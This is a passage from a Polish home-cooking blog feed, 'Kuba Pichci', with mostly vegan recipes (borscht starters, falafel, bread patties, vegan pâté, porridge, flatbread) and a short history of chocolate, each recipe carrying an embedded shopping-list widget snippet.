osolonego wrzątku i parzymy około minutę.Nakładamy farsz na liście i zawijamy. Jeśli liść będzie za wąski, można użyć dwóch.Gołąbki układamy ciasno w garnku i zalewamy bulionem.Przykrywamy pozostałymi liśćmi i dusimy na wolnym ogniu około 30 minut.Smacznego!Post Gołąbki wegańskie z kaszą gryczaną pojawił się poraz pierwszy w Kuba Pichci.

Zakwas na barszcz biały

Kuba Pichci

Zakwas na barszcz biały

Wstawiłem ostatnio przepis na barszcz biały i zostałem zganiony przez jednego z czytelników za użycie gotowego zakwasu z butelki. Moim zdaniem niesłusznie, ponieważ bez większego problemu można dostać zakwas, który na liście składników ma tylko i wyłącznie mąkę, wodę i przyprawy i takich tylko zakwasów używam. Z drugiej jednak strony przygotowanie własnego zakwasu, co do którego jakości będziemy mieli 100% pewność jest banalnie proste, a jedynym minusem jest czas, ponieważ kisi się około około 4-5 dni. Wybór należy do Was. Proponuję na święta przygotować barszcz na zakwasie domowym, dzięki czemu zapunktujecie u swoich gości.Jeszcze jedna sprawa – zakwas na barszcz biały i zakwas na żurek to dwie podobne, ale jednak zupełnie inne sprawy. Pierwszy przygotowujemy z mąki pszennej, natomiast drugi z żytniej.przepis na zakwas na barszcz białyskładniki:1 szklanka mąki pszennej pełnoziarnistej1 litr przegotowanej wody3 ząbki czosnku2 liście laurowe3 ziarna ziela angielskiegolistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 szklanka mąki pszennej pełnoziarnistej1 litr przegotowanej wody3 ząbki czosnku2 liście laurowe3 ziarna ziela angielskiego'; document.write(" "); przygotowanie:Jedyne co musimy zrobić to wsypać mąkę do słoika i zalać letnią wodą.Następnie do naczynia wkładamy obrane ząbki czosnku i przyprawy.Całość mieszamy i zostawiamy przykryte gazą w ciepłym miejscu na klika dni.O tym czy zakwas jest gotowy świadczy poziom jego kwaśności. najlepiej samemu sprawdzić czy smak nam odpowiada, czy chcemy aby był jeszcze bardziej intensywny.Czas kiszenia zależy od temperatury – zakwas powinien być gotowy po około 4-5 dniach.Po ukiszeniu wstawić barszcz do lodówki, co spowolni dalsze procesy.Smacznego!Post Zakwas na barszcz biały pojawił się poraz pierwszy w Kuba Pichci.

Barszcz biały wegański

Kuba Pichci

Barszcz biały wegański

Barszcz biały to klasyczna zupa wielkanocna. Na stołach króluje wersja z dodatkiem białej kiełbasy i jajkiem, ja zachęcam Was do przygotowania wersji wegańskiej. Dlaczego? Bo po prostu wierzę, że jeśli możemy, powinniśmy minimalizować nasz udział w krzywdzeniu innych stworzeń. I tyle. A barszcz w wegańskiej wersji jest naprawdę bardzo smaczny. Przepis poznałem na warsztatach organizowanych przez łódzki oddział Fundacji Międzynarodowy Ruch na Rzecz Zwierząt – Viva!przepis na barszcz biały w wegańskiej odsłonieskładniki:1,5 l wody3 suszone grzyby100 g podsmażonych grzybów6 kotletów sojowych350 g tofu1 butelka barszczu białegoLiść laurowyKilka ziaren ziela angielskiego3 parówki sojowelistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1,5 l wody3 suszone grzyby100 g podsmażonych grzybów6 kotletów sojowych350 g tofu1 butelka barszczu białegoLiść laurowyKilka ziaren ziela angielskiego3 parówki sojowe'; document.write(" "); przygotowanie:Podsmażone grzyby siekamy i wkładamy do garnka. Zalewamy wodą i dodajemy pokruszone suszone grzyby, liść laurowy, ziele angielskie oraz łyżkę oleju.Gotujemy na średnim ogniu około 15 minut.Dodajemy barszcz a butelki. Wlewamy go porcjami i kontrolujemy smak zupy.Kotlety namaczamy we wrzątku, odciskamy i kroimy w kostkę. Przesmażamy je na odrobinie oleju.Tofu i parówki kroimy w kostkę i dodajemy razem z kotletami sojowymi do zupy.Barszcz zaprawiamy śmietaną (najlepiej wegańską) i doprawiamy do smaku.Smacznego!Post Barszcz biały wegański pojawił się poraz pierwszy w Kuba Pichci.

Słodko-gorzka historia czekolady

Kuba Pichci

Słodko-gorzka historia czekolady

Czekoladę znano już ponad 3000 tysiące lat temu. W kulturze plemion mezoamerykańskich ziarna kakaowca, z którego jest wyrabiana były tak cenne, że używano ich jako środka płatniczego. Wytwarzany z nich napój pity był przy okazji różnego rodzaju uroczystości i obrzędów, uważano go również za afrodyzjak. Pierwotnie płynne czekoladowe smakołyki były gorzkie i dodawano do nich przede wszystkim chili, pieprz i wanilię.Pieniądze, które rosły na drzewachTwórcami czekolady zostali okrzyknięci Olmekowie – plemię koczujące na terenach dzisiejszego Meksyku prawie 4000 lat temu. Ich tradycje związane z uprawą kakaowca i piciem przyrządzanego z jego ziaren napoju kontynuowali Majowie i Aztekowie. Na przysmaki, bez których dzisiaj nie wyobrażamy sobie udanego przyjęcia czy deseru, takie jak tort czekoladowy, pralinki czy batony Europejczycy musieli poczekać aż do XVI wieku. Dopiero wtedy za sprawą hiszpańskich konkwistadorów ziarna kakaowca trafiły na stary kontynent. W 1502 roku Krzysztof Kolumb podczas swojej ostatniej wyprawy zrabował statek Majów wypełniony ziarnami kakaowca. Ten cenny ładunek ku rozpaczy tubylców został zatopiony, a Kolumb z wyprawy przywiózł jedynie garść otoczonych czcią i kultem ziaren. 21 lat później Hernán Cortés zwabiony obietnicą bogactwa wyruszył na podbój El Dorado. Jego zdziwienie było ogromne, gdy dowiedział się, że bogactwem Azteków nie było złoto a owoce kakaowca. Mimo wielkiego rozczarowania i upokorzenia, jakie w związku z tym przeżył słynny odkrywca, to właśnie on jako pierwszy przywiózł do Europy pierwszy duży transport cudownych ziaren. Hiszpanie powitali ten dar z dużym dystansem. Gorzki napój początkowo nie przypadł im do gustu.Pralinki i tabliczki czekoladyJednak płynna czekolada, której przypisywano właściwości lecznicze szybko zyskała grono wielbicieli, najpierw w Hiszpanii a później we Francji i całej Europie. A to za sprawą miodu i cukru, który wspaniale łagodził naturalną gorycz kakaowca. W drugiej połowie XVII wieku we Francji, w pałacowej kuchni na dworze króla Ludwika XIV – wielkiego miłośnika czekolady wymyślono praliny. Istnieje wiele mitów na temat sposobu, w jaki sposób doszło do ich powstania. Jedna z opowieści mówi o niezdarnym pomocniku kucharza, który przez przypadek do kotła z płynną czekoladą strącił migdał w karmelu. Czekolada, którą znamy dziś, a więc ta w tabliczkach podzielonych na małe kosteczki, stała się przełomem w czekoladowej historii, ponieważ była związana z opracowaniem receptury odtłuszczonego sypkiego kakao, które rozpuszczało się w mleku oraz wymyśleniem prasy do ziaren kakaowca, co miało miejsce dopiero w XIX wieku. Ten wynalazek zapoczątkował czekoladową rewolucję. Post Słodko-gorzka historia czekolady pojawił się poraz pierwszy w Kuba Pichci.

Kotlety z chleba

Kuba Pichci

Kotlety z chleba

Staram się nie marnować żywności. Zdarzy się oczywiście, że o czymś zapomnę, coś się niespodziewanie szybko popsuje czy inna podobna sytuacja, ale generalnie dbam o to, aby nic, co nadaje się do zjedzenia, nie lądowało w koszu. W sezonie działkowym, nawet obierki odkładam i w weekendy zasilam nimi kompost.Plagą w naszym domu jest chleb, szczególnie ten kupowany w weekend. Nigdy nie wiemy ile pieczywa  nam zejdzie, więc często kupujemy za dużo i zostaje nam w poniedziałek nieświeży chleb, który pewnie wiele osób wyrzuciłoby do kosza. Nie idźcie tą drogą! Chleb, szczególnie właśnie ten, który swe najlepsze dni ma za sobą, doskonale nadaje się do przygotowania ciekawych potraw. Można z nie go zrobić chociażby zapiekankę lub kotlety z chleba, jak te poniżej. przepis na kotlety z chlebaskładniki:chlebwodacebulakilka pieczarekpęczek natki pietruszki2 łyżki siemienia lnianegolistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='chlebwodacebulakilka pieczarekpęczek natki pietruszki2 łyżki siemienia lnianego'; document.write(" "); przygotowanie:Chleb kroimy w drobną kostkę i przekładamy do miski. Zalewamy niewielką ilością wody i wyrabiamy masę. Wody ma być tyle, abyśmy uzyskali coś na kształt wilgotnej, ale nie ociekającej wodą, gąbki.Cebulę kroimy w kostkę i szklimy na odrobinie tłuszczu. Po chwili dodajemy pokrojone w kostkę pieczarki i przesmażamy razem kilka minut.Cebulę i pieczarki, a także posiekaną natkę pietruszki dodajemy do masy chlebowej.Siemię mielimy lub rozgniatamy w moździerzu. Dodajemy nieco wody (tyle, żeby zakryć ziarna), mieszamy i dodajemy do masy.Całość mieszamy do połączenia się składników i doprawiamy do smaku.Z masy wrabiamy kotlety, które obsmażamy na patelni.Smacznego!Post Kotlety z chleba pojawił się poraz pierwszy w Kuba Pichci.

Falafele

Kuba Pichci

Falafele

Bardzo lubię te bliskowschodnie kotleciki i cieszę się, ponieważ pojawiają się w ofercie coraz liczniejszych lokali. Może nie są one tak powszechnie dostępne w Polsce jak np. kebaby, ale coraz więcej foodtrucków je posiada w menu. Warto jednak przygotować je samodzielnie, bo to banalnie prosta potrawa, której zrobienie zajmuje kilkanaście minut. Co więcej, nie trzeba ich wcale smażyć w głębokim tłuszczu jak ma to zwykle miejsce, ale spokojnie możnato zrobić na kilku kroplach oleju.Oryginalnie falafele robi się zwykle z samej ciecierzycy i doprawia się je orientalnymi przyprawami, ja jednak dodaję do nich soczewicę, a doprawiam według gustu jaki mam danego dnia.przepis na falafeleskładniki:puszka  ciecierzycy (400 g)puszka soczewicy lub fasoli (400 g)1 cytryna1 czubata łyżeczka zmielonego ziela angielskiego1 łyżka mąki pszennej1 pęczek świeżej natki pietruszki1 ząbek czosnkulistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='puszka  ciecierzycy (400 g)puszka soczewicy lub fasoli (400 g)1 cytryna1 czubata łyżeczka zmielonego ziela angielskiego1 łyżka mąki pszennej1 pęczek świeżej natki pietruszki1 ząbek czosnku'; document.write(" "); przygotowanie:Ciecierzycę i soczewicę odcedzamy i przekładamy do miski.Dodajemy otartą skórkę cytryny i sok z połówki.Dodajemy ziele angielskie, mąkę, czosnek i natkę (z łodygami).Całość blendujemy na gładką masę i doprawiamy do smaku.Formujemy kotleciki o grubości 1,5 cm. Jeśli masa się mocno klei, zwilżamy dłonie zimną wodą.Wykładamy na patelnię, spłaszczamy wierzch i smażymy na niewielkiej ilości tłuszczu.Smacznego!Post Falafele pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Zakwas buraczany

Chciałbym dziś podzielić się z Wami przepisem na zakwas buraczany. Do czego nam taki zakwas? A chociażby do przygotowania pysznego barszczu czerwonego, który smakiem kładzie na łopatki jakikolwiek barszcz z torebki czy kartonika, jakie możemy kupić w sklepach.Ostatecznie można użyć zakwasu sklepowego, niektóre z nich mają naprawdę niezły skład, ale zastanówcie się sami – jeśli jedyne co musicie zrobić to w zasadzie tylko obrać i pokroić buraki, dodać czosnek i zalać wodą, to czy warto? Nikt przecież nie wybierze takich ładnych buraków jak Wy sami, a co więcej możecie dowolnie dopasować smak zakwasu dodając różne przyprawy.Oprócz barszczu, zakwas to także po prostu napój, który warto popijać codziennie, ponieważ wzmacnia i oczyszcza organizm. Działa zbawiennie na nasz układ krwionośny, pokarmowy i odpornościowy. Zawiera mnóstwo witamin i wartości odżywczych. Jedna szklanka dziennie podobno czyni cuda, a już na pewno nie zaszkodzi.Możnaby tak go zachwalać i zachwalać, ale lepiej po prostu go sobie przygotować, co nie jest wcale skomplikowane. Właściwie to musimy tylko obrać warzywa i zalać je wodą, a resztę zrobią już za nas dobroczynne bakterie. O tym jak przygotować barszcz napiszę za kilka dni.przepis na zakwas buraczanyskładniki:1 kg buraków5 ząbków czosnkukilka ziaren ziela angielskiegokilka liści laurowych2 litry przegotowanej wody1 łyżki soli (1 łyżka na litr wody)listonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 kg buraków5 ząbków czosnkukilka ziaren ziela angielskiegokilka liści laurowych2 litry przegotowanej wody1 łyżki soli (1 łyżka na litr wody)'; document.write(" "); przygotowanie:Buraki obieramy i kroimy w kawałki (plastry, ćwiartki, kostkę – jak kto lubi, ale chyba najlepiej w plastry). Wkładamy je do szklanego lub kamionkowego naczynia.Dodajemy obrane ząbki czosnku oraz przyprawy.Zalewamy osoloną wodą, tak aby warzywa były całkowicie przykryte.Przykrywamy ściereczką i odstawiamy na 5 dni w spokojne miejsce o temperaturze pokojowej.Codziennie zdejmujemy powstającą pianę i białe plamki (nie należy się tym przejmować).Gdy zakwas będzie już wyraźnie pachniał „kwaśno”, odcedzamy i przelewamy go do słoików czy butelek i wstawiamy do lodówki.Nie mam pojęcia ile może stać w lodówce – ja konsumuję go w ciągu kilku dni.Smacznego!Post Zakwas buraczany pojawił się poraz pierwszy w Kuba Pichci.

Muffiny piernikowe z konfiturą wiśniową

Kuba Pichci

Muffiny piernikowe z konfiturą wiśniową

Dlaczego na świątecznym stole znaleźć miałyby się jedynie pierniki i makowce? Może warto odejść od tradycyjnych wypieków i zaskoczyć gości muffinami piernikowymi, które nie tylko pięknie pachną, ale także dzięki konfiturze wspaniale smakują?przepis muffiny piernikowe z konfiturą wiśniowąskładniki:380 g mąki pszennej5 łyżek kakao130 g cukru2 łyżeczki proszku do pieczeniaprzyprawa piernikowa (według uznania)szczypta soli380 ml mleka170 g roztopionego i ostudzonego masła2 jajkasłoik (240 g) konfitury wiśniowejlistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='380 g mąki pszennej5 łyżek kakao130 g cukru2 łyżeczki proszku do pieczeniaprzyprawa piernikowa (według uznania)szczypta soli380 ml mleka170 g roztopionego i ostudzonego masła2 jajkasłoik (240 g) konfitury wiśniowej'; document.write(" "); Przygotowanie:W jednej misce mieszamy składniki suche (mąkę, kakao, cukier, proszek do pieczenia, przyprawę piernikową i sól).W drugiej misce mieszamy składniki mokre (mleko, masło, jajka).Łączymy ze sobą zawartość obu naczyń i mieszamy do połączenia się składników.Nakładamy ciasto do 1/3 wysokości foremek, następnie nakładamy po łyżeczce konfitury i uzupełniamy ciastem do 2/3 wysokości foremek.Pieczemy około 25 minut w 180 st. C.Smacznego!Post Muffiny piernikowe z konfiturą wiśniową pojawił się poraz pierwszy w Kuba Pichci.

Pieczona dynia z pęczakiem i jarmużem

Kuba Pichci

Pieczona dynia z pęczakiem i jarmużem

Nie wiem czy jest inny produkt, który tak mocno kojarzy się z jesienią jak dynia. Ładnie teraz wyglądają, prezentują się dumnie na straganach. Wybór jest spory – bez problemu można w Polsce znaleźć dynię piżmową, makaronową, hokkaido. Mamy też dynię ozdobną, która może średnio nadaje się do jedzenia, za to można wykorzystać ją do dekoracji razem z innymi elementami. Inspirację jak dodać jesiennej oprawy przygotowywanym daniom znaleźć można na stronie Westwing.Przepis na poniższe danie zaczerpnąłem z bloga Vegeaddicted. To tak naprawdę bardzo proste danie, ale efekt jest bardzo smaczny.przepis na pieczoną dynią z pęczakiem i jarmużemskładniki:1 szklanka kaszy pęczakdynia2 garście jarmużu2 ząbki czosnkugarść pestek dynilistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 szklanka kaszy pęczakdynia2 garście jarmużu2 ząbki czosnkugarść pestek dyni'; document.write(" "); przygotowanie:Dynię kroimy na ćwiartki, usuwamy pestki i miąższ i nacieramy solą i pieprzem i pieczemy około 30-40 minut w 200 st. C aż zmięknie.Kaszę płuczemy, zalewamy dwoma szklankami wody, lekko solimy i gotujemy, aż zaabsorbuje całkowicie płyn.Rozgrzewamy nieco oleju i przesmażamy na nim krótko posiekany czosnek, a następnie dodajemy posiekany jarmuż i przesmażamy chwilę całość.Dynię kroimy w kostkę i dodajemy do kaszy. Dodajemy także jarmuż i doprawiamy do smaku.Smacznego!Post Pieczona dynia z pęczakiem i jarmużem pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Wegański pasztet z grzybami i suszonymi śliwkami

Przygotowanie domowego wegańskiego pasztetu jest dużo prostsze niż może się to wydawać. Fakt, że czasem awaryjnie można kupić gotowca w sklepie, ale zwykle w składzie znajdziemy sporo różnych nieciekawych niespodzianek, których lepiej unikać. Tym razem polecam pasztet na bazie kaszy jęczmiennej.przepis na wegański pasztet z grzybami i suszonymi śliwkamiskładniki:garść suszonych śliwekgarść suszonych grzybówłyżeczka suszonego rozmarynuszklanka kaszy jęczmiennej2 łyżki siemienia lnianegocebulasos worcestershirekurkumalistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='garść suszonych śliwekgarść suszonych grzybówłyżeczka suszonego rozmarynuszklanka kaszy jęczmiennej2 łyżki siemienia lnianegocebulasos worcestershirekurkuma'; document.write(" "); przygotowanie:Grzyby zalewamy niewielką ilością wody (tyle tylko by je przykryć), lekko solimy i dodajemy rozmaryn. Gotujemy je do momentu aż zmiękną i będą gotowe do jedzenia. Gdy będą gotowe, odcedzamy je i kroimy w paski.Kaszę jęczmienną zalewamy dwoma szklankami wody, solimy i gotujemy, aż zupełnie wchłonie płyn.Siemię mielimy blenderem, następnie dodajemy do kaszy i blendujemy na w miarę gładką masę.Cebulę kroimy w kostkę i szklimy na odrobinie oleju. Następnie dodajemy pokrojone śliwki i grzyby. Przesmażamy razem krótką chwilę, a następnie dodajemy do kaszy.Mieszamy masę i doprawiamy do smaku sosem worcestershire (mnie wystarczyła jedna łyżka), kurkumą (jedna łyżeczka wystarczy), solą i pieprzem.Przekładamy do keksówki i pieczemy około 45 minut w 180 st. C.Wyjmujemy w piekarnika i pozwalamy spokojnie ostygnąć.Smacznego!Post Wegański pasztet z grzybami i suszonymi śliwkami pojawił się poraz pierwszy w Kuba Pichci.

Owsianka z jabłkiem, cynamonem i bananam

Kuba Pichci

Owsianka z jabłkiem, cynamonem i bananam

Brałem niedawno udział w bardzo inspirujących warsztatach kulinarnych, na trakcie których uczestnicy przygotowywali zdrowe i odżywcze śniadania. Sporo przy tej okazji rozmawialiśmy m. in. o owsiankach i o tym, że każdy w zasadzie ma swój własny ulubiony sposób na to danie. Ja dziś podzielę się z wami moim ulubionym, a jednocześnie niezwykle prostym sposobem przygotowania. Takie pyszne śniadanie można przygotować dosłownie w 5 minut, a jest o wiele lepsze niż zwykła kanapka.przepis na owsiankę z jabłkiem, cynamonem i bananemskładniki:1/2 szklanki płatków owsianych1 szklanka wody lub mleka roślinnego1 jabłko1 bananłyżka miodułyżka cynamonulistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1/2 szklanki płatków owsianych1 szklanka wody lub mleka roślinnego1 jabłko1 bananłyżka miodułyżka cynamonu'; document.write(" "); przygotowanie:Płatki zalewamy wodą lub mlekiem i gotujemy, aż wchłoną płyn.Banana kroimy w cienki plasterki, a jabłko ścieramy na tarce.Dodajemy owoce do ugotowanych płatków i doprawiamy miodem i cynamonem.Mieszamy całość i zajadamy.Smacznego!Post Owsianka z jabłkiem, cynamonem i bananam pojawił się poraz pierwszy w Kuba Pichci.

Puszyste naleśniki z farszem dyniowo-twarogowym

Kuba Pichci

Puszyste naleśniki z farszem dyniowo-twarogowym

Kluski z kaszy jaglanej z sosem serowym

Kuba Pichci

Kluski z kaszy jaglanej z sosem serowym

Wiele razy pisałem już o dobroczynnym wpływie kaszy na nasz organizm. Najlepsza ze wszystkich jest podobno kasza jaglana, której przygotowanie jest niezwykle proste. Pamiętać jedynie trzeba o tym, by przepłukać ją porządnie gorącą wodą, co pozbawi ją charakterystycznej goryczki. Kaszę można jadać jako zwykły dodatek, ale równie dobrze można zrobić z niej główny punkt posiłku przygotowując z niej np. kluski.przepis na kluski z kaszy jaglanejskładniki:250 g ugotowanej kaszy jaglanej1 cebulaząbek czosnkupieprz ziołowy2 jajkamąkalistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='250 g ugotowanej kaszy jaglanej1 cebulaząbek czosnkupieprz ziołowy2 jajkamąka'; document.write(" "); przygotowanie:Cebulę drobno siekamy i szklimy nieco na odrobinie tłuszczu.Dodajemy ją do kaszy razem z przeciśniętym przez praskę czosnkiem.Doprawiamy do smaku pieprzem ziołowym i solą.Dodajemy jajka i mieszamy.W razie, jeśli masa będzie zbyt rzadka, potrzeby dodajemy mąkę.Z kaszy formujemy kulki wielkości orzecha włoskiego i wrzucamy do osolonego wrzątku.Gotujemy do czasu, aż kluski wypłyną na powierzchnię.Podajemy z sosem lub okrasą.Smacznego!Post Kluski z kaszy jaglanej z sosem serowym pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Sałatka makaronowa z roszponką

Sałatka makaronowa to całkiem niezły pomysł na wykorzystanie resztek po obiedzie. Nie wiem jak Wy, ale ja zawsze gotuję więcej makaronu niż jest mi potrzebne do posiłku, i zostaję z porcją albo nawet dwoma. Ale to żaden problem – makaron to tak elastyczny produkt, że możemy z niego przygotować i sałatkę i zapiekankę, można go dodać do zupy itd.Do tej sałatki dodałem ser feta (w tym wypadku spokojnie można kupić ser „typu feta”), który obtoczyłem w gomasio – posypce z siemienia lnianego, o której pisałem kilka dni temu.przepis na sałatkę makaronową z roszponkąskładniki:makaron (najlepiej pełnoziarnisty)roszponkaząbek czosnkuser typu fetagomasiooliwa z oliweklistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='makaron (najlepiej pełnoziarnisty)roszponkaząbek czosnkuser typu fetagomasiooliwa z oliwek'; document.write(" "); przygotowanie:Makaron, jeśli zdążył już ostygnąć i się skleić przelewamy gorącą wodą i odstawiamy na durszlak.Ser kroimy w kostkę i obtaczamy w wysypanym na talerz gomasio.Roszponkę dokładnie płuczemy i odwirowujemy.Ząbek czosnku rozgniatamy, przeciskamy przez praskę i dodajemy do makaronu.Dodajemy także roszponkę i ser.Całość skrapiamy oliwą i delikatnie mieszamy.Odstawiamy na pół godziny, aby smaki się przegryzły.Smacznego!Post Sałatka makaronowa z roszponką pojawił się poraz pierwszy w Kuba Pichci.

Podpłomyk z patelni bez drożdzy

Kuba Pichci

Podpłomyk z patelni bez drożdzy

Zapewne niejednokrotnie kupowaliście w sklepie gotowe tortille. Sam kupuję je od czasu do czasu. Problem w tym, że nie tylko sporo kosztują, ale też często nafaszerowane są one chemią, która sprawia, że pozostają świeże przez wiele miesięcy. A można zamiast takich placków przygotować niezwykle proste podpłomyki – wystarczy woda, mąka i sól.przepis na podpłomykiskładniki:450 g przesianej mąki pszennej250 ml wody1 łyżeczka solilistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='450 g przesianej mąki pszennej250 ml wody1 łyżeczka soli'; document.write(" "); przygotowanie:Mąkę mieszamy z pozostałymi składnikami.Ciasto nakładamy na mocno rozgrzaną patelnię.W razie potrzeby można lekko natłuścić patelnię, aby placki nie przywierały.Smażymy krótko z obu stron, aż placki się zarumienią.Smacznego!Post Podpłomyk z patelni bez drożdzy pojawił się poraz pierwszy w Kuba Pichci.